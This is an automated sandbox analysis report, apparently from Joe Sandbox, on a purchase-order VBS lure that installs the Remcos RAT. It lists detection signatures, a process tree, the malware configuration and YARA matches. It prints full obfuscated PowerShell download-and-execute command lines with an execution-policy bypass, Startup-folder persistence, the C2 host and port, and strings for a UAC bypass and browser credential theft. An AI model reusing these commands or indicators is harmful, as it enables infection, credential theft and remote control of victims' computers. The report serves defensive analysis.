Edit tour

Windows Analysis Report
Purchase Order - PO14895.vbs

Overview

General Information

Sample name:	Purchase Order - PO14895.vbs
Analysis ID:	1524801
MD5:	411a23153d97ad4c071a62d54e928d6b
SHA1:	f1fc194cf23bd614ed793037f6700c565e88b11b
SHA256:	cf85e5927fe85ba85cd070fcc7a6fdf206625e836a9194143f789d24ed1671ab
Tags:	vbsuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Sigma detected: Remcos

Suricata IDS alerts for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected Remcos RAT

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Installs a global keyboard hook

Obfuscated command line found

Sample has a suspicious name (potential lure to open the executable)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses dynamic DNS services

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7640 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order - PO14895.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 7728 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7776 cmdline: ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D)

powershell.exe (PID: 7864 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 7964 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))" MD5: 04029E121A0CFA5991749937DD22A1D9)

AddInProcess32.exe (PID: 7464 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

AddInProcess32.exe (PID: 7444 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "ab9001.ddns.net:55543:1", "Assigned name": "OCT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "vlc.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "chrorne-9OH0YR", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
0000000B.00000002.2644104191.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
0000000B.00000002.2646574192.000000000262E000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.1575148283.000001B056132000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x23cbf0:$a1: Remcos restarted by watchdog! 0x23d148:$a3: %02i:%02i:%02i:%03i 0x23d4cd:$a4: * Remcos v
00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.1575148283.000001B0571DA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x4afdf0:$a1: Remcos restarted by watchdog! 0x4b0348:$a3: %02i:%02i:%02i:%03i 0x4b06cd:$a4: * Remcos v
Process Memory Space: powershell.exe PID: 7964	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x16d0c:$b3: ::UTF8.GetString( 0x18945:$b3: ::UTF8.GetString( 0x18f63:$b3: ::UTF8.GetString( 0x1dd6a:$b3: ::UTF8.GetString( 0x1e4dd:$b3: ::UTF8.GetString( 0x1ef58:$b3: ::UTF8.GetString( 0x1f57d:$b3: ::UTF8.GetString( 0x1fd33:$b3: ::UTF8.GetString( 0x204f1:$b3: ::UTF8.GetString( 0x20d79:$b3: ::UTF8.GetString( 0x216ca:$b3: ::UTF8.GetString( 0x2296e:$b3: ::UTF8.GetString( 0x23a81:$b3: ::UTF8.GetString( 0x531c0:$b3: ::UTF8.GetString( 0x537de:$b3: ::UTF8.GetString( 0x55b9a:$b3: ::UTF8.GetString( 0x561bf:$b3: ::UTF8.GetString( 0x569d1:$b3: ::UTF8.GetString( 0x571b9:$b3: ::UTF8.GetString( 0x5b809:$b3: ::UTF8.GetString( 0x5be27:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 8080	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 8080	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xb0f7b6:$a1: Remcos restarted by watchdog! 0xe12b63:$a1: Remcos restarted by watchdog! 0xb0fced:$a3: %02i:%02i:%02i:%03i 0xb102a6:$a3: %02i:%02i:%02i:%03i 0xe1309a:$a3: %02i:%02i:%02i:%03i 0xe13653:$a3: %02i:%02i:%02i:%03i 0xb0ff0f:$a4: * Remcos v 0xe132bc:$a4: * Remcos v
Process Memory Space: powershell.exe PID: 8080	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x929027:$b2: ::FromBase64String( 0x92b0c8:$b2: ::FromBase64String( 0x92b285:$b2: ::FromBase64String( 0x37828:$s1: -join 0x39ed7:$s1: -join 0x6a8d5:$s1: -JoIN 0x6ad2e:$s1: -JoIN 0x6b3a7:$s1: -JoIN 0x6b9bb:$s1: -JoIN 0x6eba5:$s1: -join 0x6ebe0:$s1: -join 0x6eca7:$s1: -join 0x6ecd5:$s1: -join 0x6ee91:$s1: -join 0x6eeb4:$s1: -join 0x6f181:$s1: -join 0x6f1a2:$s1: -join 0x6f1d4:$s1: -join 0x6f21c:$s1: -join 0x6f249:$s1: -join 0x6f270:$s1: -join
Process Memory Space: AddInProcess32.exe PID: 7444	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 7444	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xb62f:$a1: Remcos restarted by watchdog! 0xbb66:$a3: %02i:%02i:%02i:%03i 0xc11f:$a3: %02i:%02i:%02i:%03i 0xbd88:$a4: * Remcos v
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.powershell.exe.1b057622410.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.powershell.exe.1b057622410.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
8.2.powershell.exe.1b057622410.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
8.2.powershell.exe.1b057622410.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
11.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.AddInProcess32.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x691e0:$a1: Remcos restarted by watchdog! 0x69738:$a3: %02i:%02i:%02i:%03i 0x69abd:$a4: * Remcos v
11.2.AddInProcess32.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x641e4:$str_a1: C:\Windows\System32\cmd.exe 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6320c:$str_b2: Executing file: 0x64328:$str_b3: GetDirectListeningPort 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63e30:$str_b7: \update.vbs 0x63234:$str_b9: Downloaded file: 0x63220:$str_b10: Downloading file: 0x632c4:$str_b12: Failed to upload file: 0x642f0:$str_b13: StartForward 0x64310:$str_b14: StopForward 0x63dd8:$str_b15: fso.DeleteFile " 0x63d6c:$str_b16: On Error Resume Next 0x63e08:$str_b17: fso.DeleteFolder " 0x632b4:$str_b18: Uploaded file: 0x63274:$str_b19: Unable to delete: 0x63da0:$str_b20: while fso.FileExists(" 0x63749:$str_c0: [Firefox StoredLogins not found]
11.2.AddInProcess32.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x63100:$s1: \Classes\mscfile\shell\open\command 0x63160:$s1: \Classes\mscfile\shell\open\command 0x63148:$s2: eventvwr.exe
11.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.AddInProcess32.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
11.2.AddInProcess32.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
11.2.AddInProcess32.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
8.2.powershell.exe.1b057622410.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
8.2.powershell.exe.1b057622410.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
8.2.powershell.exe.1b057622410.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxb

Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation

Source: Process started

